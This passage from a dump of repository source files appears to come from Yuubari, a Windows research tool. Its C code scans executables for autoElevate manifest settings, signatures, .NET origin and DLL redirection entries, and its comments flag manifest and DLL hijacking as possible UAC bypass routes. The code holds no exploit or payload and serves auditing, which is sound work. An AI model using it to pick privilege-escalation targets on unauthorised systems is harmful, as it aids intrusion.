(sizeof(szTextBuffer) / sizeof(WCHAR)) - 64, NULL) == 0)\n {\n _strcpy_w(szTextBuffer, TEXT(\"Error code: \"));\n itostr_w(dwLastError, _strend_w(szTextBuffer));\n }\n\n cuiPrintTextW(szTextBuffer, UseReturn);\n}\n"
},
{
"path": "Source/Yuubari/cui.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2018\n*\n* TITLE: CUI.H\n*\n* VERSION: 1.30\n*\n* DATE: 01 Aug 2018\n*\n* Common header file for console ui.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID cuiInitialize(\n _In_ BOOL InitInput,\n _Out_opt_ PBOOL IsConsoleOutput\n );\n\n#ifdef _UNICODE\n#define cuiPrintText cuiPrintTextW\n#define cuiPrintTextLastError cuiPrintTextLastErrorW\n#else\n#define cuiPrintText cuiPrintTextA\n#define cuiPrintTextLastError cuiPrintTextLastErrorA\n#endif\n\n\nVOID cuiPrintTextA(\n _In_ LPSTR lpText,\n _In_ BOOL UseReturn\n );\n\nVOID cuiPrintTextW(\n\t_In_ LPWSTR lpText,\n\t_In_ BOOL UseReturn\n\t);\n\nVOID cuiPrintTextLastErrorA(\n _In_ BOOL UseReturn\n );\n\nVOID cuiPrintTextLastErrorW(\n _In_ BOOL UseReturn\n );\n\nVOID cuiClrScr(\n VOID\n );\n"
},
{
"path": "Source/Yuubari/fusion.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n* TITLE: FUSION.C\n*\n* VERSION: 1.61\n*\n* DATE: 12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nptrWTGetSignatureInfo WTGetSignatureInfo = NULL;\n\n/*\n* IsExemptedAutoApproveEXE\n*\n* Purpose:\n*\n* Check if the given file is Exempted AutoApprove EXE.\n*\n*/\nBOOLEAN IsExemptedAutoApproveEXE(\n _In_ LPWSTR lpFileName,\n _In_ HANDLE hFile)\n{\n SIGNATURE_INFO sigData;\n NTSTATUS status;\n\n LPWSTR lpName = _filename(lpFileName);\n\n if ((_strcmpi(lpName, L\"sysprep.exe\") == 0) ||\n (_strcmpi(lpName, L\"inetmgr.exe\") == 0))\n {\n RtlSecureZeroMemory(&sigData, sizeof(sigData));\n sigData.cbSize = sizeof(sigData);\n status = WTGetSignatureInfo(lpFileName, hFile,\n SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,\n &sigData,\n NULL, NULL);\n if (NT_SUCCESS(status))\n return ((sigData.SignatureState == SIGNATURE_STATE_VALID) && (sigData.fOSBinary != FALSE));\n }\n\n return FALSE;\n}\n\n/*\n* SxsGetTocHeaderFromActivationContext\n*\n* Purpose:\n*\n* Locate and return pointer to Toc header in activation context.\n*\n*/\nNTSTATUS SxsGetTocHeaderFromActivationContext(\n _In_ PACTIVATION_CONTEXT ActivationContext,\n _Out_ PACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader,\n _Out_opt_ PACTIVATION_CONTEXT_DATA* ActivationContextData\n)\n{\n NTSTATUS result = STATUS_UNSUCCESSFUL;\n ACTIVATION_CONTEXT_DATA* ContextData = NULL;\n ACTIVATION_CONTEXT_DATA_TOC_HEADER* Header;\n WCHAR szLog[0x100];\n\n if (ActivationContext == NULL)\n return STATUS_INVALID_PARAMETER_1;\n if (TocHeader == NULL)\n return STATUS_INVALID_PARAMETER_2;\n\n __try {\n\n do {\n\n RtlSecureZeroMemory(szLog, sizeof(szLog));\n\n ContextData = ActivationContext->ActivationContextData;\n\n if (ContextData->Magic != ACTIVATION_CONTEXT_DATA_MAGIC) {\n wsprintf(szLog, TEXT(\"ActivationContext Magic = %lx invalid\"), ContextData->Magic);\n break;\n }\n\n if (\n (ContextData->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA)) ||\n (ContextData->HeaderSize > ContextData->TotalSize)\n )\n {\n wsprintf(szLog, TEXT(\"Unexpected data HeaderSize = %lu\"), ContextData->HeaderSize);\n break;\n }\n\n if (ContextData->DefaultTocOffset > ContextData->TotalSize) {\n wsprintf(szLog, TEXT(\"Unexpected Toc offset %lx\"), ContextData->DefaultTocOffset);\n break;\n }\n\n Header = (ACTIVATION_CONTEXT_DATA_TOC_HEADER*)(((LPBYTE)ContextData) + ContextData->DefaultTocOffset);\n if (Header->HeaderSize != sizeof(ACTIVATION_CONTEXT_DATA_TOC_HEADER)) {\n wsprintf(szLog, TEXT(\"Unexpected Toc HeaderSize %lu\"), Header->HeaderSize);\n break;\n }\n\n if ((Header->FirstEntryOffset != 0) && (Header->EntryCount == 0)) {\n wsprintf(szLog, TEXT(\"Unexpected EntryCount %lu\"), Header->EntryCount);\n break;\n }\n\n if ((Header->EntryCount > 0) && (Header->FirstEntryOffset == 0)) {\n wsprintf(szLog, TEXT(\"Unexpected Toc FirstEntryOffset %lu\"), Header->FirstEntryOffset);\n break;\n }\n\n if (Header->FirstEntryOffset > ContextData->TotalSize) {\n wsprintf(szLog, TEXT(\"Toc FirstEntry offset = %lu invalid\"), Header->FirstEntryOffset);\n break;\n }\n\n *TocHeader = Header;\n if (ActivationContextData != NULL)\n *ActivationContextData = ContextData;\n\n result = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (!NT_SUCCESS(result)) {\n OutputDebugString(szLog);\n return STATUS_SXS_CORRUPTION;\n }\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return STATUS_SXS_CORRUPTION;\n }\n return result;\n}\n\n/*\n* SxsAllocInitUnicodeString\n*\n* Purpose:\n*\n* Allocates a buffer, copies a UNICODE string from the specified offset and length\n* of a section header, and initializes a UNICODE_STRING structure.\n*\n*/\nNTSTATUS SxsAllocInitUnicodeString(\n _In_ LPVOID SectionHeader,\n _In_ SIZE_T Offset,\n _In_ SIZE_T Length,\n _Out_ UNICODE_STRING* Destination\n)\n{\n WCHAR* Buffer;\n\n if (!Destination || !SectionHeader || !Length)\n return STATUS_INVALID_PARAMETER;\n\n //\n // Allocate memory for string with space for NULL-terminator.\n //\n Buffer = (WCHAR*)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Length + sizeof(UNICODE_NULL));\n if (!Buffer)\n return STATUS_NO_MEMORY;\n\n __try {\n RtlCopyMemory(\n Buffer,\n (PBYTE)SectionHeader + Offset,\n Length\n );\n RtlInitUnicodeString(Destination, Buffer);\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Buffer);\n return STATUS_SXS_CORRUPTION;\n }\n\n return STATUS_SUCCESS;\n}\n\n/*\n* SxsGetStringSectionRedirectionDlls\n*\n* Purpose:\n*\n* Extracts redirection DLLs from a string section entry and populates a DLL redirection list.\n*\n*/\nNTSTATUS SxsGetStringSectionRedirectionDlls(\n _In_ ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader,\n _In_ ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry,\n _Inout_ PDLL_REDIRECTION_LIST DllList\n)\n{\n ULONG SegmentIndex;\n NTSTATUS result = STATUS_SXS_KEY_NOT_FOUND, status;\n DLL_REDIRECTION_LIST_ENTRY* DllListEntry;\n ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT* DllPathSegment;\n ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION* DataDll;\n\n if (!DllList)\n return result;\n\n __try {\n DataDll = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION*)(((LPBYTE)SectionHeader) + StringEntry->Offset);\n\n if (!DataDll || !DataDll->PathSegmentOffset || DataDll->PathSegmentCount == 0)\n return result;\n\n DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)(((LPBYTE)SectionHeader) + DataDll->PathSegmentOffset);\n\n for (SegmentIndex = 0; SegmentIndex < DataDll->PathSegmentCount; SegmentIndex++) {\n if (DllPathSegment && DllPathSegment->Length && DllPathSegment->Offset) {\n DllListEntry = (DLL_REDIRECTION_LIST_ENTRY*)\n RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(DLL_REDIRECTION_LIST_ENTRY));\n\n if (DllListEntry) {\n \n status = SxsAllocInitUnicodeString(\n SectionHeader,\n StringEntry->KeyOffset,\n StringEntry->KeyLength,\n &DllListEntry->KeyName);\n\n if (!NT_SUCCESS(status)) {\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);\n if (status == STATUS_SXS_CORRUPTION)\n return status;\n continue;\n }\n\n status = SxsAllocInitUnicodeString(\n SectionHeader,\n DllPathSegment->Offset,\n DllPathSegment->Length,\n &DllListEntry->DllName);\n\n if (!NT_SUCCESS(status)) {\n RtlFreeUnicodeString(&DllListEntry->KeyName);\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllListEntry);\n if (status == STATUS_SXS_CORRUPTION)\n return status;\n continue;\n }\n\n RtlInterlockedPushEntrySList(&DllList->Header, &DllListEntry->ListEntry);\n }\n }\n\n DllPathSegment = (ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT*)\n (((LPBYTE)DllPathSegment) + sizeof(ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT));\n }\n\n result = STATUS_SUCCESS;\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return STATUS_SXS_CORRUPTION;\n }\n\n return result;\n}\n\n/*\n* SxsGetDllRedirectionFromActivationContext\n*\n* Purpose:\n*\n* Query redirection dll list from activation context data.\n*\n*/\nNTSTATUS SxsGetDllRedirectionFromActivationContext(\n _In_ PACTIVATION_CONTEXT ActivationContext,\n _In_ PDLL_REDIRECTION_LIST DllList\n)\n{\n ULONG i, j;\n NTSTATUS result = STATUS_UNSUCCESSFUL, status;\n ACTIVATION_CONTEXT_DATA* ContextData = NULL;\n ACTIVATION_CONTEXT_DATA_TOC_HEADER* TocHeader = NULL;\n ACTIVATION_CONTEXT_DATA_TOC_ENTRY* TocEntry = NULL;\n ACTIVATION_CONTEXT_STRING_SECTION_HEADER* SectionHeader = NULL;\n ACTIVATION_CONTEXT_STRING_SECTION_ENTRY* StringEntry = NULL;\n\n WCHAR szLog[0x100];\n\n __try {\n\n if (ActivationContext == NULL)\n return STATUS_INVALID_PARAMETER_1;\n if (DllList == NULL)\n return STATUS_INVALID_PARAMETER_2;\n\n do {\n if (!NT_SUCCESS(SxsGetTocHeaderFromActivationContext(ActivationContext, &TocHeader, &ContextData)))\n break;\n\n TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)ContextData) + TocHeader->FirstEntryOffset);\n\n RtlInitializeSListHead(&DllList->Header);\n\n i = 1;\n while (i < TocHeader->EntryCount) {\n if (TocEntry->Format == ACTIVATION_CONTEXT_SECTION_FORMAT_STRING) {\n SectionHeader = (ACTIVATION_CONTEXT_STRING_SECTION_HEADER*)(((LPBYTE)ContextData) + TocEntry->Offset);\n if (SectionHeader->Magic != ACTIVATION_CONTEXT_STRING_SECTION_MAGIC) {\n wsprintf(szLog, TEXT(\"Section Magic = %lx invalid\"), SectionHeader->Magic);\n OutputDebugString(szLog);\n break;\n }\n if (SectionHeader->HeaderSize != sizeof(ACTIVATION_CONTEXT_STRING_SECTION_HEADER)) {\n wsprintf(szLog, TEXT(\"Unexpected Section HeaderSize = %lu\"), SectionHeader->HeaderSize);\n OutputDebugString(szLog);\n break;\n }\n\n if (TocEntry->Id == ACTIVATION_CONTEXT_SECTION_DLL_REDIRECTION) {\n StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)SectionHeader) + SectionHeader->ElementListOffset);\n status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);\n if (status == STATUS_SXS_CORRUPTION)\n continue;\n\n for (j = 1; j < SectionHeader->ElementCount; j++) {\n StringEntry = (ACTIVATION_CONTEXT_STRING_SECTION_ENTRY*)(((LPBYTE)StringEntry) + sizeof(ACTIVATION_CONTEXT_STRING_SECTION_ENTRY));\n status = SxsGetStringSectionRedirectionDlls(SectionHeader, StringEntry, DllList);\n if (status == STATUS_SXS_CORRUPTION)\n continue;\n }\n }\n }\n TocEntry = (ACTIVATION_CONTEXT_DATA_TOC_ENTRY*)(((LPBYTE)TocEntry) + sizeof(ACTIVATION_CONTEXT_DATA_TOC_ENTRY));\n i += 1;\n } //while (i < TocHeader->EntryCount)\n\n DllList->Depth = RtlQueryDepthSList(&DllList->Header);\n result = (DllList->Depth == 0) ? STATUS_SXS_SECTION_NOT_FOUND : STATUS_SUCCESS;\n\n } while (FALSE);\n\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return STATUS_SXS_CORRUPTION;\n }\n\n return result;\n}\n\n/*\n* FusionProbeForRedirectedDlls\n*\n* Purpose:\n*\n* Probe activation context for redirection dlls and output them if found.\n*\n*/\nNTSTATUS FusionProbeForRedirectedDlls(\n _In_ LPWSTR lpFileName,\n _In_ ACTIVATION_CONTEXT* ActivationContext,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n NTSTATUS status;\n SLIST_ENTRY* ListEntry = NULL;\n DLL_REDIRECTION_LIST_ENTRY* DllData = NULL;\n UAC_FUSION_DATA_DLL FusionRedirectedDll;\n DLL_REDIRECTION_LIST DllList;\n\n __try {\n RtlSecureZeroMemory(&DllList, sizeof(DllList));\n status = SxsGetDllRedirectionFromActivationContext(ActivationContext, &DllList);\n if (NT_SUCCESS(status)) {\n while (DllList.Depth) {\n ListEntry = RtlInterlockedPopEntrySList(&DllList.Header);\n if (ListEntry) {\n DllData = (PDLL_REDIRECTION_ENTRY)ListEntry;\n RtlSecureZeroMemory(&FusionRedirectedDll, sizeof(FusionRedirectedDll));\n FusionRedirectedDll.DataType = UacFusionDataRedirectedDllType;\n FusionRedirectedDll.FileName = lpFileName;\n FusionRedirectedDll.KeyName = DllData->KeyName.Buffer;\n FusionRedirectedDll.DllName = DllData->DllName.Buffer;\n OutputCallback((PVOID)&FusionRedirectedDll);\n\n RtlFreeUnicodeString(&DllData->DllName);\n RtlFreeUnicodeString(&DllData->KeyName);\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, DllData);\n }\n DllList.Depth--;\n }\n RtlInterlockedFlushSList(&DllList.Header);\n }\n }\n __except (EXCEPTION_EXECUTE_HANDLER) {\n return STATUS_SXS_CORRUPTION;\n }\n return status;\n}\n\n/*\n* FusionCheckFile\n*\n* Purpose:\n*\n* Query file manifest data related to security.\n*\n*/\nVOID FusionCheckFile(\n _In_ LPWSTR lpDirectory,\n _In_ WIN32_FIND_DATA* fdata,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n DWORD lastError;\n NTSTATUS status;\n HANDLE hFile = NULL, hSection = NULL, hActCtx = INVALID_HANDLE_VALUE;\n LPWSTR FileName = NULL, pt = NULL;\n PBYTE DllBase = NULL;\n SIZE_T DllVirtualSize, sz, l;\n OBJECT_ATTRIBUTES attr;\n UNICODE_STRING usFileName;\n IO_STATUS_BLOCK iosb;\n ULONG_PTR ResourceSize = 0;\n ULONG_PTR IdPath[3];\n\n ACTCTX ctx;\n\n SIGNATURE_INFO sigData;\n UAC_FUSION_DATA FusionCommonData;\n ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION ctxrl;\n WCHAR szValue[100];\n\n usFileName.Buffer = NULL;\n\n do {\n\n if ((lpDirectory == NULL) || (fdata == NULL))\n break;\n\n if (fdata->dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)\n break;\n\n sz = (_strlen(lpDirectory) + _strlen(fdata->cFileName) + 2) * sizeof(WCHAR); // +2 for NULL and possible '\\'\n sz = ALIGN_UP_BY(sz, PAGE_SIZE);\n FileName = (LPWSTR)VirtualAlloc(NULL, sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n if (FileName == NULL)\n break;\n\n pt = FileName;\n\n _strcpy(FileName, lpDirectory);\n l = _strlen(FileName);\n if (pt[l - 1] != L'\\\\') {\n pt[l] = L'\\\\';\n pt[l + 1] = 0;\n }\n\n if (l + _strlen(fdata->cFileName) < sz / sizeof(WCHAR)) {\n _strcat(FileName, fdata->cFileName);\n }\n else {\n break; // Path too long, skip this file\n }\n\n if (RtlDosPathNameToNtPathName_U(FileName, &usFileName, NULL, NULL) == FALSE)\n break;\n\n InitializeObjectAttributes(&attr, &usFileName,\n OBJ_CASE_INSENSITIVE, NULL, NULL);\n RtlSecureZeroMemory(&iosb, sizeof(iosb));\n\n //\n // Open file and map it.\n //\n status = NtCreateFile(&hFile, SYNCHRONIZE | FILE_READ_DATA,\n &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN,\n FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);\n\n if (!NT_SUCCESS(status))\n break;\n\n status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL,\n NULL, PAGE_READONLY, SEC_IMAGE, hFile);\n if (!NT_SUCCESS(status))\n break;\n\n DllBase = NULL;\n DllVirtualSize = 0;\n status = NtMapViewOfSection(hSection, NtCurrentProcess(), (PVOID*)&DllBase,\n 0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY);\n if (!NT_SUCCESS(status))\n break;\n\n RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n FusionCommonData.Name = FileName;\n\n //\n // Look for embedded manifest resource\n //\n IdPath[0] = (ULONG_PTR)RT_MANIFEST;\n IdPath[1] = (ULONG_PTR)CREATEPROCESS_MANIFEST_RESOURCE_ID;\n IdPath[2] = 0;\n status = LdrResSearchResource(DllBase, (ULONG_PTR*)&IdPath, 3, 0,\n (LPVOID*)&pt, (ULONG_PTR*)&ResourceSize, NULL, NULL);\n\n FusionCommonData.IsFusion = NT_SUCCESS(status);\n\n //\n // File has no manifest embedded.\n //\n if (FusionCommonData.IsFusion == FALSE) {\n switch (status) {\n case STATUS_RESOURCE_TYPE_NOT_FOUND:\n OutputDebugString(TEXT(\"LdrResSearchResource: resource type not found\\r\\n\"));\n break;\n case STATUS_RESOURCE_DATA_NOT_FOUND:\n OutputDebugString(TEXT(\"LdrResSearchResource: resource data not found\\r\\n\"));\n break;\n case STATUS_RESOURCE_NAME_NOT_FOUND:\n OutputDebugString(TEXT(\"LdrResSearchResource: resource name not found\\r\\n\"));\n break;\n default:\n break;\n }\n\n //\n // No embedded manifest, possible manifest hijacking for versions below RS1\n //\n if (\n (status == STATUS_RESOURCE_TYPE_NOT_FOUND) ||\n (status == STATUS_RESOURCE_DATA_NOT_FOUND) ||\n (status == STATUS_RESOURCE_NAME_NOT_FOUND)\n ) {\n if (WTGetSignatureInfo != NULL) {\n //\n // Check if file is signed as part of an operation system\n //\n RtlSecureZeroMemory(&sigData, sizeof(sigData));\n sigData.cbSize = sizeof(sigData);\n status = WTGetSignatureInfo(FileName, hFile,\n SIF_BASE_VERIFICATION | SIF_CHECK_OS_BINARY | SIF_CATALOG_SIGNED,\n &sigData,\n NULL, NULL);\n if (NT_SUCCESS(status)) {\n if (sigData.fOSBinary != FALSE) {\n\n RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n FusionCommonData.Name = FileName;\n FusionCommonData.IsOSBinary = TRUE;\n\n //\n // Check if signature valid or trusted\n //\n FusionCommonData.IsSignatureValidOrTrusted = ((sigData.SignatureState == SIGNATURE_STATE_TRUSTED) ||\n (sigData.SignatureState == SIGNATURE_STATE_VALID));\n\n OutputCallback((PVOID)&FusionCommonData);\n }\n }\n }\n else { //WTGetSignatureInfo != NULL\n\n //\n // On Windows 7 this API is not available, just output result.\n //\n RtlSecureZeroMemory(&FusionCommonData, sizeof(FusionCommonData));\n FusionCommonData.Name = FileName;\n OutputCallback((PVOID)&FusionCommonData);\n }\n }\n\n //break the global loop\n break;\n }\n\n //\n // File has manifest, create activation context for it.\n //\n RtlSecureZeroMemory(&ctx, sizeof(ctx));\n ctx.cbSize = sizeof(ACTCTX);\n ctx.dwFlags = ACTCTX_FLAG_RESOURCE_NAME_VALID | ACTCTX_FLAG_HMODULE_VALID;\n ctx.lpResourceName = CREATEPROCESS_MANIFEST_RESOURCE_ID;\n ctx.lpSource = FileName;\n ctx.hModule = (HMODULE)DllBase;\n\n hActCtx = CreateActCtx(&ctx);\n if (hActCtx == INVALID_HANDLE_VALUE) {\n lastError = GetLastError();\n RtlSecureZeroMemory(szValue, sizeof(szValue));\n _strcpy(szValue, TEXT(\"Unexpected activation context failure =\"));\n ultostr(lastError, _strend(szValue));\n _strcat(szValue, TEXT(\"\\r\\n\"));\n OutputDebugString(szValue);\n break;\n }\n\n //\n // Query run level and uiAccess information.\n //\n RtlSecureZeroMemory(&ctxrl, sizeof(ctxrl));\n status = RtlQueryInformationActivationContext(RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF,\n (PCACTIVATION_CONTEXT)hActCtx,\n NULL,\n RunlevelInformationInActivationContext,\n (PVOID)&ctxrl,\n sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION),\n NULL);\n\n if (NT_SUCCESS(status)) {\n RtlCopyMemory(&FusionCommonData.RunLevel, &ctxrl, sizeof(ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION));\n }\n\n //\n // DotNet application highly vulnerable for Dll Hijacking attacks.\n // Always check if file is DotNet origin.\n //\n FusionCommonData.IsDotNet = supIsCorImageFile(DllBase);\n\n //\n // Query autoelevate setting.\n //\n l = 0;\n RtlSecureZeroMemory(&szValue, sizeof(szValue));\n status = RtlQueryActivationContextApplicationSettings(0, hActCtx, NULL, TEXT(\"autoElevate\"), (PWSTR)&szValue, sizeof(szValue), &l);\n if (NT_SUCCESS(status)) {\n\n //\n // Actually appinfo only looks for 'T' or 't' symbol \n // for performance reasons perhaps\n //\n if (_strcmpi(szValue, TEXT(\"true\")) == 0)\n FusionCommonData.AutoElevateState = AutoElevateEnabled;\n else\n //\n // Several former autoelevate applications has autoelevated strictly \n // disabled in manifest as part of their UAC fixes.\n //\n if (_strcmpi(szValue, TEXT(\"false\")) == 0)\n FusionCommonData.AutoElevateState = AutoElevateDisabled;\n }\n else {\n\n //\n // Check specific \"exempted\" autoelevated files, they may not have \"autoelevate\" in manifest.\n //\n if (IsExemptedAutoApproveEXE(FileName, hFile)) {\n FusionCommonData.AutoElevateState = AutoElevateExempted;\n }\n\n //\n // Query settings failed, check if it known error like sxs key not exist. \n //\n if (status != STATUS_SXS_KEY_NOT_FOUND) {\n RtlSecureZeroMemory(szValue, sizeof(szValue));\n _strcpy(szValue, TEXT(\"QueryActivationContext error =\"));\n ultostr(status, _strend(szValue));\n _strcat(szValue, TEXT(\"\\r\\n\"));\n OutputDebugString(szValue);\n\n //\n // Don't output anything, just break, it is unexpected situation.\n //\n break;\n }\n }\n\n //\n // Even if autoElevate key could be not found, application still can be in whitelist.\n // As in case of inetmgr.exe on RS1+, so check if it has redirection dlls.\n //\n OutputCallback((PVOID)&FusionCommonData);\n\n //\n // Print redirection dlls from activation context\n // \n FusionProbeForRedirectedDlls(FileName, (PACTIVATION_CONTEXT)hActCtx, OutputCallback);\n\n\n } while (FALSE);\n\n if (hActCtx != INVALID_HANDLE_VALUE)\n ReleaseActCtx(hActCtx);\n\n if (usFileName.Buffer != NULL)\n RtlFreeUnicodeString(&usFileName);\n\n if (DllBase != NULL)\n NtUnmapViewOfSection(NtCurrentProcess(), DllBase);\n\n if (hSection != NULL)\n NtClose(hSection);\n\n if (hFile != NULL)\n NtClose(hFile);\n\n if (FileName != NULL)\n VirtualFree(FileName, 0, MEM_RELEASE);\n}\n\n/*\n* FusionScanFiles\n*\n* Purpose:\n*\n* Scan directory for files of given type.\n*\n*/\nVOID FusionScanFiles(\n _In_ LPWSTR lpDirectory,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n HANDLE hFile;\n LPWSTR lpLookupDirectory = NULL;\n SIZE_T sz;\n WIN32_FIND_DATA fdata;\n\n sz = (_strlen(lpDirectory) + MAX_PATH) * sizeof(WCHAR);\n lpLookupDirectory = (LPWSTR)supHeapAlloc(sz);\n if (lpLookupDirectory) {\n _strncpy(lpLookupDirectory, MAX_PATH, lpDirectory, MAX_PATH);\n _strcat(lpLookupDirectory, TEXT(\"\\\\*.exe\"));\n\n hFile = FindFirstFile(lpLookupDirectory, &fdata);\n if (hFile != INVALID_HANDLE_VALUE) {\n do {\n FusionCheckFile(lpDirectory, &fdata, OutputCallback);\n } while (FindNextFile(hFile, &fdata));\n FindClose(hFile);\n }\n supHeapFree(lpLookupDirectory);\n }\n}\n\n/*\n* FusionScanDirectory\n*\n* Purpose:\n*\n* Recursively scan directories.\n*\n*/\nVOID FusionScanDirectory(\n _In_ LPWSTR lpDirectory,\n _In_ OUTPUTCALLBACK OutputCallback\n)\n{\n SIZE_T cchBuffer;\n HANDLE hDirectory;\n LPWSTR lpFilePath;\n WIN32_FIND_DATA fdata;\n\n FusionScanFiles(lpDirectory, OutputCallback);\n\n cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);\n lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));\n if (lpFilePath) {\n\n _strcpy(lpFilePath, lpDirectory);\n supConcatenatePaths(lpFilePath, L\"*\", cchBuffer);\n\n hDirectory = FindFirstFile(lpFilePath, &fdata);\n if (hDirectory != INVALID_HANDLE_VALUE) {\n do {\n if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&\n (fdata.cFileName[0] != L'.')\n )\n {\n _strcpy(lpFilePath, lpDirectory);\n supConcatenatePaths(lpFilePath, fdata.cFileName, cchBuffer);\n FusionScanDirectory(lpFilePath, OutputCallback);\n }\n } while (FindNextFile(hDirectory, &fdata));\n FindClose(hDirectory);\n }\n\n supHeapFree(lpFilePath);\n }\n}\n"
},
{
"path": "Source/Yuubari/fusion.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n* TITLE: FUSION.H\n*\n* VERSION: 1.61\n*\n* DATE: 12 Feb 2026\n*\n* Header file for the autoelevated applications scan.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define UacFusionDataCommonType 0\n#define UacFusionDataRedirectedDllType 1\n\ntypedef enum {\n AutoElevateUnspecified = 0,\n AutoElevateDisabled = 1,\n AutoElevateEnabled = 2,\n AutoElevateExempted = 3\n} AUTOELEVATESTATE;\n\ntypedef struct _UAC_FUSION_DATA {\n DWORD DataType;\n LPWSTR Name;\n ACTIVATION_CONTEXT_RUN_LEVEL_INFORMATION RunLevel;\n AUTOELEVATESTATE AutoElevateState;\n BOOL IsFusion;\n BOOL IsDotNet;\n BOOL IsOSBinary;\n BOOL IsSignatureValidOrTrusted;\n} UAC_FUSION_DATA, *PUAC_FUSION_DATA;\n\ntypedef struct _UAC_FUSION_DATA_DLL {\n DWORD DataType;\n LPWSTR FileName;\n LPWSTR KeyName;\n LPWSTR DllName;\n} UAC_FUSION_DATA_DLL, *PUAC_FUSION_DATA_DLL;\n\ntypedef struct _DLL_REDIRECTION_LIST_ENTRY {\n SLIST_ENTRY ListEntry;\n //For release RtlFreeUnicodeString used, Buffer of both allocated in Process Heap\n UNICODE_STRING KeyName;\n UNICODE_STRING DllName; \n} DLL_REDIRECTION_LIST_ENTRY, *PDLL_REDIRECTION_ENTRY;\n\ntypedef struct _DLL_REDIRECTION_LIST {\n SLIST_HEADER Header;\n ULONG Depth;\n} DLL_REDIRECTION_LIST, *PDLL_REDIRECTION_LIST;\n\nNTSTATUS SxsGetDllRedirectionFromActivationContext(\n _In_ PACTIVATION_CONTEXT ActivationContext,\n _In_ PDLL_REDIRECTION_LIST DllList);\n\nVOID FusionScanDirectory(\n _In_ LPWSTR lpDirectory,\n _In_ OUTPUTCALLBACK OutputCallback);\n\nextern ptrWTGetSignatureInfo WTGetSignatureInfo;\n"
},
{
"path": "Source/Yuubari/global.h",
